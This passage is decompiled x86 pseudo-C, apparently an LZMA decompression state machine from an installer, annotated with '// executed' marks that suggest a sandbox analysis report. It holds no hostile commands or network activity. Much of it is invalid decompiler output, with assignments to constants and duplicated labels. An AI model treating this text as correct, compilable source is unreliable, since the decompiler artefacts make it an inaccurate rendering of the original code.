						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
